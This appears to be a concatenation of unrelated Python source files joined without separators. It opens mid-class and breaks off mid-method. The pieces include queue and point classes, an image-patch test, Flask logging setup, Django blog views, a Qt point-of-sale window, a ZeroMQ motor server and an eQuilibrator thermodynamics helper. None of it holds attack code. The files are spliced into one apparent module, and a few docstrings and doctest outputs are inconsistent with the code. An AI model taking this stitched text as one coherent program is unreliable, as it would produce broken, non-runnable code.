    def __getitem__(self, index):
        """Get the value at the given index.

        Parameters
        ----------
        index : int
            The index into the array.

        """
        return self._data[index]

    def __len__(self):
        """The length of the array.

        Returns
        -------
        int :
            The size of the array

        """
        return self._size


class Point2D(object):
    """The 2d-point class.

    The 2d-point class is a container for positions
    in a 2d-coordinate system.

    Parameters
    ----------
    x : float, optional
        The x-position in a 2d-coordinate system. Default is 0.0.
    y : float, optional
        The y-position in a 2d-coordinate system. Default is 0.0.

    Attributes
    ----------
    x : float
        The x-position in a 2d-coordinate system.
    y : float
        The y-position in a 2d-coordinate system.

    """
    __slots__ = ['x', 'y']

    def __init__(self, x=0.0, y=0.0):
        self.x = x
        self.y = y


class Point3D(object):
    """
    The 3d-point class.

    The 3d-point class is a container for positions
    in a 3d-coordinate system.

    Parameters
    ----------
    x : float, optional
        The x-position in a 2d-coordinate system. Default is 0.0.
    y : float, optional
        The y-position in a 2d-coordinate system. Default is 0.0.
    z : float, optional
        The z-position in a 3d-coordinate system. Default is 0.0.

    Attributes
    ----------
    x : float
        The x-position in a 2d-coordinate system.
    y : float
        The y-position in a 2d-coordinate system.
    z : float
        The z-position in a 3d-coordinate system.

    """
    __slots__ = ['x', 'y', 'z']

    def __init__(self, x=0.0, y=0.0, z=0.0):
        self.x = x
        self.y = y
        self.z = z


class Vector3D(Point3D):
    """The 3d-vector class.

    .. todo::
        Implement vector functionality.

    Parameters
    ----------
    x : float, optional
        The x-position in a 2d-coordinate system. Default is 0.0.
    y : float, optional
        The y-position in a 2d-coordinate system. Default is 0.0.
    z : float, optional
        The z-position in a 3d-coordinate system. Default is 0.0.

    Attributes
    ----------
    x : float
        The x-position in a 2d-coordinate system.
    y : float
        The y-position in a 2d-coordinate system.
    z : float
        The z-position in a 3d-coordinate system.

    """

    def __init__(self, x=0.0, y=0.0, z=0.0):
        super(Vector3D, self).__init__(x, y, z)


class Queue(object):
    """The abstract queue base class.

    The queue class handles core functionality common for
    any type of queue. All queues inherit from the queue
    base class.

    See Also
    --------
    :class:`FIFOQueue`, :class:`PriorityQueue`

    """
    __metaclass__ = ABCMeta

    def __init__(self):
        self._queue = []

    def __len__(self):
        return len(self._queue)

    def __contains__(self, item):
        try:
            self._queue.index(item)
            return True
        except Exception:
            return False

    def __iter__(self):
        return iter(self._queue)

    def __str__(self):
        return '[' + ', '.join('{}'.format(el) for el in self._queue) + ']'

    def __repr__(self):
        return ', '.join('{}'.format(el) for el in self._queue)

    @abstractmethod
    def push(self, item):
        """Push a new element on the queue

        Parameters
        ----------
        item :
            The element to push on the queue

        """
        raise NotImplementedError

    @abstractmethod
    def pop(self):
        """Pop an element from the queue."""
        raise NotImplementedError

    def empty(self):
        """Check if the queue is empty.

        Returns
        -------
        bool :
            Whether the queue is empty.

        """
        return len(self._queue) <= 0

    def extend(self, items):
        """Extend the queue by a number of elements.

        Parameters
        ----------
        items : list
            A list of items.

        """
        for item in items:
            self.push(item)

    def get(self, item):
        """Return the element in the queue identical to `item`.

        Parameters
        ----------
        item :
            The element to search for.

        Returns
        -------
        The element in the queue identical to `item`. If the element
        was not found, None is returned.

        """
        try:
            index = self._queue.index(item)
            return self._queue[index]
        except Exception:
            return None

    def remove(self, item):
        """Remove an element from the queue.

        Parameters
        ----------
        item :
            The element to remove.

        """
        self._queue.remove(item)


class FIFOQueue(Queue):
    """The first-in-first-out (FIFO) queue.

    In a FIFO queue the first element added to the queue
    is the first element to be removed.

    Examples
    --------
    >>> q = FIFOQueue()
    >>> q.push(5)
    >>> q.extend([1, 3, 7])
    >>> print q
    [5, 1, 3, 7]

    Retrieving an element:

    >>> q.pop()
    5

    Removing an element:

    >>> q.remove(3)
    >>> print q
    [1, 7]

    Get the element in the queue identical to the given item:

    >>> q.get(7)
    7

    Check if the queue is empty:

    >>> q.empty()
    False

    Loop over the elements in the queue:

    >>> for x in q:
    >>>     print x
    1
    7

    Check if an element is in the queue:

    >>> if 7 in q:
    >>>     print "yes"
    yes

    See Also
    --------
    :class:`PriorityQueue`

    """
    def __init__(self):
        super(FIFOQueue, self).__init__()

    def push(self, item):
        """Push an element to the end of the queue.

        Parameters
        ----------
        item :
            The element to append.

        """
        self._queue.append(item)

    def pop(self):
        """Return the element at the front of the queue.

        Returns
        -------
        The first element in the queue.

        """
        return self._queue.pop(0)

    def extend(self, items):
        """Append a list of elements at the end of the queue.

        Parameters
        ----------
        items : list
            List of elements.

        """
        self._queue.extend(items)


class PriorityQueue(Queue):
    """
    The priority queue.

    In a priority queue each element has a priority associated with it. An element
    with high priority (i.e., smallest value) is served before an element with low priority
    (i.e., largest value). The priority queue is implemented with a heap.

    Parameters
    ----------
    func : callable
        A callback function handling the priority. By default the priority
        is the value of the element.

    Examples
    --------
    >>> q = PriorityQueue()
    >>> q.push(5)
    >>> q.extend([1, 3, 7])
    >>> print q
    [(1,1), (5,5), (3,3), (7,7)]

    Retrieving the element with highest priority:

    >>> q.pop()
    1

    Removing an element:

    >>> q.remove((3, 3))
    >>> print q
    [(5,5), (7,7)]

    Get the element in the queue identical to the given item:

    >>> q.get(7)
    7

    Check if the queue is empty:

    >>> q.empty()
    False

    Loop over the elements in the queue:

    >>> for x in q:
    >>>     print x
    (5, 5)
    (7, 7)

    Check if an element is in the queue:

    >>> if 7 in q:
    >>>     print "yes"
    yes

    See Also
    --------
    :class:`FIFOQueue`

    """
    def __init__(self, func=lambda x: x):
        super(PriorityQueue, self).__init__()

        self.func = func

    def __contains__(self, item):
        for _, element in self._queue:
            if item == element:
                return True
        return False

    def __str__(self):
        return '[' + ', '.join('({},{})'.format(*el) for el in self._queue) + ']'

    def push(self, item):
        """Push an element on the priority queue.

        The element is pushed on the priority queue according
        to its priority.

        Parameters
        ----------
        item :
            The element to push on the queue.

        """
        heapq.heappush(self._queue, (self.func(item), item))

    def pop(self):
        """Get the element with the highest priority.

        Get the element with the highest priority (i.e., smallest value).

        Returns
        -------
        The element with the highest priority.

        """
        return heapq.heappop(self._queue)[1]

    def get(self, item):
        """Return the element in the queue identical to `item`.

        Parameters
        ----------
        item :
            The element to search for.

        Returns
        -------
        The element in the queue identical to `item`. If the element
        was not found, None is returned.

        """
        for _, element in self._queue:
            if item == element:
                return element
        return None

    def remove(self, item):
        """Remove an element from the queue.

        Parameters
        ----------
        item :
            The element to remove.

        """
        super(PriorityQueue, self).remove(item)
        heapq.heapify(self._queue)

import unittest
import numpy as np
from bayesnet.image.util import img2patch, patch2img


class TestImg2Patch(unittest.TestCase):

    def test_img2patch(self):
        img = np.arange(16).reshape(1, 4, 4, 1)
        patch = img2patch(img, size=3, step=1)
        expected = np.asarray([
            [img[0, 0:3, 0:3, 0], img[0, 0:3, 1:4, 0]],
            [img[0, 1:4, 0:3, 0], img[0, 1:4, 1:4, 0]]
        ])
        expected = expected[None, ..., None]
        self.assertTrue((patch == expected).all())

        imgs = [
            np.random.randn(2, 5, 6, 3),
            np.random.randn(3, 10, 10, 2),
            np.random.randn(1, 23, 17, 5)
        ]
        sizes = [
            (1, 1),
            2,
            (3, 4)
        ]
        steps = [
            (1, 2),
            (3, 1),
            3
        ]
        shapes = [
            (2, 5, 3, 1, 1, 3),
            (3, 3, 9, 2, 2, 2),
            (1, 7, 5, 3, 4, 5)
        ]
        for img, size, step, shape in zip(imgs, sizes, steps, shapes):
            self.assertEqual(shape, img2patch(img, size, step).shape)


class TestPatch2Img(unittest.TestCase):

    def test_patch2img(self):
        img = np.arange(16).reshape(1, 4, 4, 1)
        patch = img2patch(img, size=2, step=2)
        self.assertTrue((img == patch2img(patch, (2, 2), (1, 4, 4, 1))).all())
        patch = img2patch(img, size=3, step=1)
        expected = np.arange(0, 32, 2).reshape(1, 4, 4, 1)
        expected[0, 0, 0, 0] /= 2
        expected[0, 0, -1, 0] /= 2
        expected[0, -1, 0, 0] /= 2
        expected[0, -1, -1, 0] /= 2
        expected[0, 1:3, 1:3, 0] *= 2
        self.assertTrue((expected == patch2img(patch, (1, 1), (1, 4, 4, 1))).all())


if __name__ == '__main__':
    unittest.main()

'''
logger_setup.py customizes the app's logging module. Each time an event is
logged the logger checks the level of the event (eg. debug, warning, info...).
If the event is above the approved threshold then it goes through. The handlers
do the same thing; they output to a file/shell if the event level is above their
threshold.
:Example:
        >> from website import logger
        >> logger.info('event', foo='bar')
**Levels**:
        - logger.debug('For debugging purposes')
        - logger.info('An event occured, for example a database update')
        - logger.warning('Rare situation')
        - logger.error('Something went wrong')
        - logger.critical('Very very bad')
You can build a log incrementally as so:
        >> log = logger.new(date='now')
        >> log = log.bind(weather='rainy')
        >> log.info('user logged in', user='John')
'''

import datetime as dt
import logging
from logging.handlers import RotatingFileHandler
import pytz

from flask import request, session
from structlog import wrap_logger
from structlog.processors import JSONRenderer

from app import app

# Set the logging level
app.logger.setLevel(app.config['LOG_LEVEL'])

# Remove the stdout handler
app.logger.removeHandler(app.logger.handlers[0])

TZ = pytz.timezone(app.config['TIMEZONE'])


def add_fields(_, level, event_dict):
    ''' Add custom fields to each record. '''
    now = dt.datetime.now()
    #event_dict['timestamp'] = TZ.localize(now, True).astimezone(pytz.utc).isoformat()
    event_dict['timestamp'] = TZ.localize(now, True).astimezone\
        (pytz.timezone(app.config['TIMEZONE'])).strftime(app.config['TIME_FMT'])
    event_dict['level'] = level
    if request:
        try:
            #event_dict['ip_address'] = request.headers['X-Forwarded-For'].split(',')[0].strip()
            event_dict['ip_address'] = request.headers.get('X-Forwarded-For', request.remote_addr)
            #event_dict['ip_address'] = request.header.get('X-Real-IP')
        except:
            event_dict['ip_address'] = 'unknown'

    return event_dict

# Add a handler to write log messages to a file
if app.config.get('LOG_FILE'):
    file_handler = RotatingFileHandler(filename=app.config['LOG_FILENAME'],
                                       maxBytes=app.config['LOG_MAXBYTES'],
                                       backupCount=app.config['LOG_BACKUPS'],
                                       mode='a',
                                       encoding='utf-8')
    file_handler.setLevel(logging.DEBUG)
    app.logger.addHandler(file_handler)

# Wrap the application logger with structlog to format the output
logger = wrap_logger(
    app.logger,
    processors=[
        add_fields,
        JSONRenderer(indent=None)
    ]
)
import _plotly_utils.basevalidators


class TextfontValidator(_plotly_utils.basevalidators.CompoundValidator):
    def __init__(self, plotly_name="textfont", parent_name="scattersmith", **kwargs):
        super(TextfontValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            data_class_str=kwargs.pop("data_class_str", "Textfont"),
            data_docs=kwargs.pop(
                "data_docs",
                """
            color

            colorsrc
                Sets the source reference on Chart Studio Cloud
                for `color`.
            family
                HTML font family - the typeface that will be
                applied by the web browser. The web browser
                will only be able to apply a font if it is
                available on the system which it operates.
                Provide multiple font families, separated by
                commas, to indicate the preference in which to
                apply fonts if they aren't available on the
                system. The Chart Studio Cloud (at
                https://chart-studio.plotly.com or on-premise)
                generates images on a server, where only a
                select number of fonts are installed and
                supported. These include "Arial", "Balto",
                "Courier New", "Droid Sans",, "Droid Serif",
                "Droid Sans Mono", "Gravitas One", "Old
                Standard TT", "Open Sans", "Overpass", "PT Sans
                Narrow", "Raleway", "Times New Roman".
            familysrc
                Sets the source reference on Chart Studio Cloud
                for `family`.
            size

            sizesrc
                Sets the source reference on Chart Studio Cloud
                for `size`.
""",
            ),
            **kwargs
        )

from django.core import serializers
from rest_framework.response import Response
from django.http import JsonResponse
try:
    from urllib import quote_plus  # python 2
except:
    pass

try:
    from urllib.parse import quote_plus  # python 3
except:
    pass

from django.contrib import messages
from django.contrib.contenttypes.models import ContentType
from django.core.paginator import Paginator, EmptyPage, PageNotAnInteger

from django.db.models import Q
from django.http import HttpResponse, HttpResponseRedirect, Http404
from django.shortcuts import render, get_object_or_404, redirect
from django.utils import timezone

from comments.forms import CommentForm
from comments.models import Comment
from .forms import PostForm
from .models import Post


def post_create(request):
    if not request.user.is_staff or not request.user.is_superuser:
        raise Http404

    form = PostForm(request.POST or None, request.FILES or None)
    if form.is_valid():
        instance = form.save(commit=False)
        instance.user = request.user
        instance.save()
        # message success
        messages.success(request, "Successfully Created")
        return HttpResponseRedirect(instance.get_absolute_url())
    context = {
        "form": form,
    }
    return render(request, "post_form.html", context)


def post_detail(request, slug=None):
    instance = get_object_or_404(Post, slug=slug)
    if instance.publish > timezone.now().date() or instance.draft:
        if not request.user.is_staff or not request.user.is_superuser:
            raise Http404
    share_string = quote_plus(instance.content)

    initial_data = {
        "content_type": instance.get_content_type,
        "object_id": instance.id
    }
    form = CommentForm(request.POST or None, initial=initial_data)
    if form.is_valid() and request.user.is_authenticated():
        c_type = form.cleaned_data.get("content_type")
        content_type = ContentType.objects.get(model=c_type)
        obj_id = form.cleaned_data.get('object_id')
        content_data = form.cleaned_data.get("content")
        parent_obj = None
        try:
            parent_id = int(request.POST.get("parent_id"))
        except:
            parent_id = None

        if parent_id:
            parent_qs = Comment.objects.filter(id=parent_id)
            if parent_qs.exists() and parent_qs.count() == 1:
                parent_obj = parent_qs.first()

        new_comment, created = Comment.objects.get_or_create(
            user=request.user,
            content_type=content_type,
            object_id=obj_id,
            content=content_data,
            parent=parent_obj,
        )
        return HttpResponseRedirect(new_comment.content_object.get_absolute_url())

    comments = instance.comments
    context = {
        "title": instance.title,
        "instance": instance,
        "share_string": share_string,
        "comments": comments,
        "comment_form": form,
    }
    return render(request, "post_detail.html", context)


def post_list(request):
    today = timezone.now().date()
    queryset_list = Post.objects.active()  # .order_by("-timestamp")
    if request.user.is_staff or request.user.is_superuser:
        queryset_list = Post.objects.all()

    query = request.GET.get("q")
    if query:
        queryset_list = queryset_list.filter(
            Q(title__icontains=query) |
            Q(content__icontains=query) |
            Q(user__first_name__icontains=query) |
            Q(user__last_name__icontains=query)
        ).distinct()
    paginator = Paginator(queryset_list, 8)  # Show 25 contacts per page
    page_request_var = "page"
    page = request.GET.get(page_request_var)
    try:
        queryset = paginator.page(page)
    except PageNotAnInteger:
        # If page is not an integer, deliver first page.
        queryset = paginator.page(1)
    except EmptyPage:
        # If page is out of range (e.g. 9999), deliver last page of results.
        queryset = paginator.page(paginator.num_pages)

    context = {
        "object_list": queryset,
        "title": "List",
        "page_request_var": page_request_var,
        "today": today,
    }
    return render(request, "post_list.html", context)


def post_update(request, slug=None):
    if not request.user.is_staff or not request.user.is_superuser:
        raise Http404
    instance = get_object_or_404(Post, slug=slug)
    form = PostForm(request.POST or None,
                    request.FILES or None, instance=instance)
    if form.is_valid():
        instance = form.save(commit=False)
        instance.save()
        messages.success(request, "<a href='#'>Item</a> Saved",
                         extra_tags='html_safe')
        return HttpResponseRedirect(instance.get_absolute_url())

    context = {
        "title": instance.title,
        "instance": instance,
        "form": form,
    }
    return render(request, "post_form.html", context)


def post_delete(request, slug=None):
    if not request.user.is_staff or not request.user.is_superuser:
        raise Http404
    instance = get_object_or_404(Post, slug=slug)
    instance.delete()
    messages.success(request, "Successfully deleted")
    return redirect("posts:list")

from ..cw_model import CWModel


class Order(CWModel):

    def __init__(self, json_dict=None):
        self.id = None  # (Integer)
        self.company = None  # *(CompanyReference)
        self.contact = None  # (ContactReference)
        self.phone = None  # (String)
        self.phoneExt = None  # (String)
        self.email = None  # (String)
        self.site = None  # (SiteReference)
        self.status = None  # *(OrderStatusReference)
        self.opportunity = None  # (OpportunityReference)
        self.orderDate = None  # (String)
        self.dueDate = None  # (String)
        self.billingTerms = None  # (BillingTermsReference)
        self.taxCode = None  # (TaxCodeReference)
        self.poNumber = None  # (String(50))
        self.locationId = None  # (Integer)
        self.businessUnitId = None  # (Integer)
        self.salesRep = None  # *(MemberReference)
        self.notes = None  # (String)
        self.billClosedFlag = None  # (Boolean)
        self.billShippedFlag = None  # (Boolean)
        self.restrictDownpaymentFlag = None  # (Boolean)
        self.description = None  # (String)
        self.topCommentFlag = None  # (Boolean)
        self.bottomCommentFlag = None  # (Boolean)
        self.shipToCompany = None  # (CompanyReference)
        self.shipToContact = None  # (ContactReference)
        self.shipToSite = None  # (SiteReference)
        self.billToCompany = None  # (CompanyReference)
        self.billToContact = None  # (ContactReference)
        self.billToSite = None  # (SiteReference)
        self.productIds = None  # (Integer[])
        self.documentIds = None  # (Integer[])
        self.invoiceIds = None  # (Integer[])
        self.configIds = None  # (Integer[])
        self.total = None  # (Number)
        self.taxTotal = None  # (Number)
        self._info = None  # (Metadata)

        # initialize object with json dict
        super().__init__(json_dict)

from pydispatch import dispatcher
from PySide import QtCore, QtGui

import cbpos
logger = cbpos.get_logger(__name__)

from .page import BasePage

class MainWindow(QtGui.QMainWindow):
    __inits = []
    
    def __init__(self):
        super(MainWindow, self).__init__()
        
        self.tabs = QtGui.QTabWidget(self)
        self.tabs.setTabsClosable(False)
        self.tabs.setIconSize(QtCore.QSize(32, 32))
        self.tabs.currentChanged.connect(self.onCurrentTabChanged)
        
        self.toolbar = self.addToolBar('Base')
        self.toolbar.setIconSize(QtCore.QSize(48,48)) #Suitable for touchscreens
        self.toolbar.setObjectName('BaseToolbar')
        
        toolbarStyle = cbpos.config['menu', 'toolbar_style']
        # The index in this list is the same as that in the configuration page
        available_styles = (
              QtCore.Qt.ToolButtonFollowStyle,
              QtCore.Qt.ToolButtonIconOnly,
              QtCore.Qt.ToolButtonTextOnly,
              QtCore.Qt.ToolButtonTextBesideIcon,
              QtCore.Qt.ToolButtonTextUnderIcon,
              )
        try:
            toolbarStyle = available_styles[int(toolbarStyle)]
        except (ValueError, TypeError, IndexError):
            toolbarStyle = QtCore.Qt.ToolButtonFollowStyle
        self.toolbar.setToolButtonStyle(toolbarStyle)
        
        self.setCentralWidget(self.tabs)
        
        self.statusBar().showMessage(cbpos.tr._('Coinbox POS is ready.'))
        
        self.setWindowTitle('Coinbox')
        
        self.callInit()
        
        self.loadToolbar()
        self.loadMenu()
    
    def loadToolbar(self):
        """
        Loads the toolbar actions, restore toolbar state, and restore window geometry.
        """

        mwState = cbpos.config['mainwindow', 'state']
        mwGeom  = cbpos.config['mainwindow', 'geometry']

        for act in cbpos.menu.actions:
            # TODO: Remember to load an icon with a proper size (eg 48x48 px for touchscreens)
            action = QtGui.QAction(QtGui.QIcon(act.icon), act.label, self)
            action.setShortcut(act.shortcut)
            action.triggered.connect(act.trigger)
            self.toolbar.addAction(action)


        #Restores the saved mainwindow's toolbars and docks, and then the window geometry.
        if mwState is not None:
            self.restoreState( QtCore.QByteArray.fromBase64(mwState) )
        if mwGeom is not None:
            self.restoreGeometry( QtCore.QByteArray.fromBase64(mwGeom) )
        else:
            self.setGeometry(0, 0, 800, 600)
    
    def loadMenu(self):
        """
        Load the menu root items and items into the QTabWidget with the appropriate pages. 
        """
        show_empty_root_items = cbpos.config['menu', 'show_empty_root_items']
        show_disabled_items = cbpos.config['menu', 'show_disabled_items']
        hide_tab_bar = not cbpos.config['menu', 'show_tab_bar']
        
        if hide_tab_bar:
            # Hide the tab bar and prepare the toolbar for extra QAction's
            self.tabs.tabBar().hide()
            # This pre-supposes that the menu items will come after the actions
            self.toolbar.addSeparator()
        
        for root in cbpos.menu.items:
            if not root.enabled and not show_disabled_items:
                continue
            
            if show_disabled_items:
                # Show all child items
                children = root.children
            else:
                # Filter out those which are disabled
                children = [i for i in root.children if i.enabled]
            
            # Hide empty menu root items
            if len(children) == 0 and not show_empty_root_items:
                continue
            
            # Add the tab
            widget = self.getTabWidget(children)
            icon = QtGui.QIcon(root.icon)
            index = self.tabs.addTab(widget, icon, root.label)
            widget.setEnabled(root.enabled)
            
            # Add the toolbar action if enabled
            if hide_tab_bar:
                # TODO: Remember to load an icon with a proper size (eg 48x48 px for touchscreens)
                action = QtGui.QAction(QtGui.QIcon(icon), root.label, self)
                action.onTrigger = lambda n=index: self.tabs.setCurrentIndex(n)
                action.triggered.connect(action.onTrigger)
                self.toolbar.addAction(action)

    def onCurrentTabChanged(self, index, tabs=None):
        if tabs is None:
            tabs = self.tabs
        widget = tabs.widget(index)
        try:
            signal = widget.shown
        except AttributeError:
            pass
        else:
            signal.emit()

    def getTabWidget(self, items):
        """
        Returns the appropriate window to be placed in the main QTabWidget,
        depending on the number of children of a root menu item.
        """
        count = len(items)
        if count == 0:
            # If there are no child items, just return an empty widget
            widget = QtGui.QWidget()
            widget.setEnabled(False)
            return widget
        elif count == 1:
            # If there is only one item, show it as is.
            logger.debug('Loading menu page for %s', items[0].name)
            widget = items[0].page()
            widget.setEnabled(items[0].enabled)
            return widget
        else:
            # If there are many children, add them in a QTabWidget
            tabs = QtGui.QTabWidget()
            tabs.currentChanged.connect(lambda i, t=tabs: self.onCurrentTabChanged(i, t))

            for item in items:
                logger.debug('Loading menu page for %s', item.name)
                
                widget = item.page()
                icon = QtGui.QIcon(item.icon)
                tabs.addTab(widget, icon, item.label)
                widget.setEnabled(item.enabled)
            return tabs
    
    def saveWindowState(self):
        """
        Saves the main window state (position, size, toolbar positions)
        """
        mwState = self.saveState().toBase64() 
        mwGeom  = self.saveGeometry().toBase64() 
        cbpos.config['mainwindow', 'state'] = unicode(mwState)
        cbpos.config['mainwindow', 'geometry'] = unicode(mwGeom)
        cbpos.config.save()


    def closeEvent(self, event):
        """
        Perform necessary operations before closing the window.
        """
        self.saveWindowState()
        #do any other thing before closing...
        event.accept()
    
    @classmethod
    def addInit(cls, init):
        """
        Adds the `init` method to the list of extensions of the `MainWindow.__init__`.
        """
        cls.__inits.append(init)
    
    def callInit(self):
        """
        Handle calls to `__init__` methods of extensions of the MainWindow.
        """
        for init in self.__inits:
            init(self)

#!/usr/bin/env python
from __future__ import division, print_function, absolute_import

from os.path import join


def configuration(parent_package='', top_path=None):
    import warnings
    from numpy.distutils.misc_util import Configuration
    from numpy.distutils.system_info import get_info, BlasNotFoundError
    config = Configuration('odr', parent_package, top_path)

    libodr_files = ['d_odr.f',
                    'd_mprec.f',
                    'dlunoc.f']

    blas_info = get_info('blas_opt')
    if blas_info:
        libodr_files.append('d_lpk.f')
    else:
        warnings.warn(BlasNotFoundError.__doc__)
        libodr_files.append('d_lpkbls.f')

    odrpack_src = [join('odrpack', x) for x in libodr_files]
    config.add_library('odrpack', sources=odrpack_src)

    sources = ['__odrpack.c']
    libraries = ['odrpack'] + blas_info.pop('libraries', [])
    include_dirs = ['.'] + blas_info.pop('include_dirs', [])
    config.add_extension('__odrpack',
                         sources=sources,
                         libraries=libraries,
                         include_dirs=include_dirs,
                         depends=(['odrpack.h'] + odrpack_src),
                         **blas_info
                         )

    config.add_data_dir('tests')
    return config


if __name__ == '__main__':
    from numpy.distutils.core import setup

    setup(**configuration(top_path='').todict())

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import zmq
from zmq.eventloop import ioloop as ioloop_mod
import zmqdecorators
import time

SERVICE_NAME = "urpobot.motor"
SERVICE_PORT = 7575
SIGNALS_PORT = 7576

# How long to wait for new commands before stopping automatically
COMMAND_GRACE_TIME = 0.250


class motorserver(zmqdecorators.service):
    def __init__(self, service_name, service_port, serialport):
        super(motorserver, self).__init__(service_name, service_port)
        self.serial_port = serialport
        self.input_buffer = ""
        self.evthandler = ioloop_mod.IOLoop.instance().add_handler(self.serial_port.fileno(), self.handle_serial_event, ioloop_mod.IOLoop.instance().READ)
        self.last_command_time = time.time()
        self.pcb = ioloop_mod.PeriodicCallback(self.check_data_reveived, COMMAND_GRACE_TIME)
        self.pcb.start()

    def check_data_reveived(self, *args):
        if (time.time() - self.last_command_time > COMMAND_GRACE_TIME):
            self._setspeeds(0,0)

    def _setspeeds(self, m1speed, m2speed):
        self.serial_port.write("S%04X%04X\n" % ((m1speed & 0xffff), (m2speed & 0xffff)))

    @zmqdecorators.method()
    def setspeeds(self, resp, m1speed, m2speed):
        self.last_command_time = time.time()
        #print("Got speeds %s,%s" % (m1speed, m2speed))
        self._setspeeds(m1speed, m2speed)
        # TODO: actually handle ACK/NACK somehow (we need to read it from the serialport but we can't block while waiting for it...)
        resp.send("ACK")

    def handle_serial_event(self, fd, events):
        # Copied from arbus that was thread based
        if not self.serial_port.inWaiting():
            # Don't try to read if there is no data, instead sleep (yield) a bit
            time.sleep(0)
            return
        data = self.serial_port.read(1)
        if len(data) == 0:
            return
        #print("DEBUG: data=%s" % data)

        # Put the data into inpit buffer and check for CRLF
        self.input_buffer += data
        # Trim prefix NULLs and linebreaks
        self.input_buffer = self.input_buffer.lstrip(chr(0x0) + "\r\n")
        #print "input_buffer=%s" % repr(self.input_buffer)
        if (    len(self.input_buffer) > 1
            and self.input_buffer[-2:] == "\r\n"):
            # Got a message, parse it (sans the CRLF) and empty the buffer
            self.message_received(self.input_buffer[:-2])
            self.input_buffer = ""

    def message_received(self, message):
        #print("DEBUG: msg=%s" % message)
        try:
            # Currently we have no incoming messages from this board
            pass
        except Exception as e:
            print "message_received exception: Got exception %s" % repr(e)
            # Ignore indexerrors, they just mean we could not parse the command
            pass
        pass

    def cleanup(self):
        print("Cleanup called")
        self._setspeeds(0,0)

    def run(self):
        print("Starting motorserver")
        super(motorserver, self).run()



if __name__ == "__main__":
    import serial
    import sys,os
    port = serial.Serial(sys.argv[1], 115200, xonxoff=False, timeout=0.01)
    instance = motorserver(SERVICE_NAME, SERVICE_PORT, port)
    instance.run()

from rest_framework import serializers
from . import models


class Invoice(serializers.ModelSerializer):
    class Meta:
        model = models.Invoice
        fields = (
            'id', 'name', 'additional_infos', 'owner',
            'creation_date', 'update_date',
        )

"""Basic thermodynamic calculations for pickaxe."""

from typing import Union

import pint
from equilibrator_api import (
    Q_,
    ComponentContribution,
    Reaction,
    default_physiological_ionic_strength,
    default_physiological_p_h,
    default_physiological_p_mg,
    default_physiological_temperature,
)
from equilibrator_api.phased_reaction import PhasedReaction
from equilibrator_assets.compounds import Compound
from equilibrator_assets.local_compound_cache import LocalCompoundCache
from equilibrator_cache.compound_cache import CompoundCache
from pymongo import MongoClient
from sqlalchemy import create_engine

from minedatabase.pickaxe import Pickaxe


class Thermodynamics:
    """Class to calculate thermodynamics of Pickaxe runs.

    Thermodynamics allows for the calculation of:
        1) Standard ∆G' of formation
        2) Standard ∆G'o of reaction
        3) Physiological ∆G'm of reaction
        4) Adjusted ∆G' of reaction

    eQuilibrator objects can also be obtained from r_ids and c_ids.

    Parameters
    ----------
    mongo_uri: str
        URI of the mongo database.
    client: MongoClient
        Connection to Mongo.
    CC: ComponentContribution
        eQuilibrator Component Contribution object to calculate ∆G with.
    lc: LocalCompoundCache
        The local compound cache to generate eQuilibrator compounds from.
    """

    def __init__(
        self,
    ):
        # Mongo params
        self.mongo_uri = None
        self.client = None
        self._core = None

        # eQ params
        self.CC = ComponentContribution()
        self.lc = None
        self._water = None

    def load_mongo(self, mongo_uri: Union[str, None] = None):
        if mongo_uri:
            self.mongo_uri = mongo_uri
            self.client = MongoClient(mongo_uri)
        else:
            self.mongo_uri = "localhost:27017"
            self.client = MongoClient()

        self._core = self.client["core"]

    def _all_dbs_loaded(self):
        if self.client and self._core and self.lc:
            return True
        else:
            print("Load connection to Mongo and eQuilibrator local cache.")
            return False

    def _eq_loaded(self):
        if self.lc:
            return True
        else:
            print("Load eQulibrator local cache.")
            return False

    def _reset_CC(self):
        """reset CC back to defaults"""
        self.CC.p_h = default_physiological_p_h
        self.CC.p_mg = default_physiological_p_mg
        self.CC.temperature = default_physiological_temperature
        self.CC.ionic_strength = default_physiological_ionic_strength

    def load_thermo_from_postgres(
        self, postgres_uri: str = "postgresql:///eq_compounds"
    ) -> None:
        """Load a LocalCompoundCache from a postgres uri for equilibrator.

        Parameters
        ----------
        postgres_uri : str, optional
            uri of the postgres DB to use, by default "postgresql:///eq_compounds"
        """
        self.lc = LocalCompoundCache()
        self.lc.ccache = CompoundCache(create_engine(postgres_uri))

        self._water = self.lc.get_compounds("O")

    def load_thermo_from_sqlite(
        self, sqlite_filename: str = "compounds.sqlite"
    ) -> None:
        """Load a LocalCompoundCache from a sqlite file for equilibrator.

        compounds.sqlite can be generated through LocalCompoundCache's method
        generate_local_cache_from_default_zenodo

        Parameters
        ----------
        sqlite_filename: str
            filename of the sqlite file to load.
        """
        self.lc = LocalCompoundCache()
        self.lc.load_cache(sqlite_filename)

        self._water = self.lc.get_compounds("O")

    def get_eQ_compound_from_cid(
        self, c_id: str, pickaxe: Pickaxe = None, db_name: str = None
    ) -> Union[Compound, None]:
        """Get an equilibrator compound for a given c_id from the core.

        Attempts to retrieve a compound from the core or a specified db_name.

        Parameters
        ----------
        c_id : str
            compound ID for MongoDB lookup of a compound.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            Database to look for compound in before core database, by default None.

        Returns
        -------
        equilibrator_assets.compounds.Compound
            eQuilibrator Compound
        """
        # Find locally in pickaxe
        compound_smiles = None
        if pickaxe:
            if c_id in pickaxe.compounds:
                compound_smiles = pickaxe.compounds[c_id]["SMILES"]
            else:
                return None

        # Find in mongo db
        elif self._all_dbs_loaded():
            if db_name:
                compound = self.client[db_name].compounds.find_one(
                    {"_id": c_id}, {"SMILES": 1}
                )
                if compound:
                    compound_smiles = compound["SMILES"]

            # No cpd smiles from database name
            if not compound_smiles:
                compound = self._core.compounds.find_one({"_id": c_id}, {"SMILES": 1})
                if compound:
                    compound_smiles = compound["SMILES"]

        # No compound_smiles at all
        if not compound_smiles or "*" in compound_smiles:
            return None
        else:
            eQ_compound = self.lc.get_compounds(
                compound_smiles, bypass_chemaxon=True, save_empty_compounds=True
            )
            return eQ_compound

    def standard_dg_formation_from_cid(
        self, c_id: str, pickaxe: Pickaxe = None, db_name: str = None
    ) -> Union[float, None]:
        """Get standard ∆Gfo for a compound.

        Parameters
        ----------
        c_id : str
            Compound ID to get the ∆Gf for.
        pickaxe : Pickaxe
            pickaxe object to look for the compound in, by default None.
        db_name : str
            Database to look for compound in before core database, by default None.

        Returns
        -------
        Union[float, None]
            ∆Gf'o for a compound, or None if unavailable.
        """
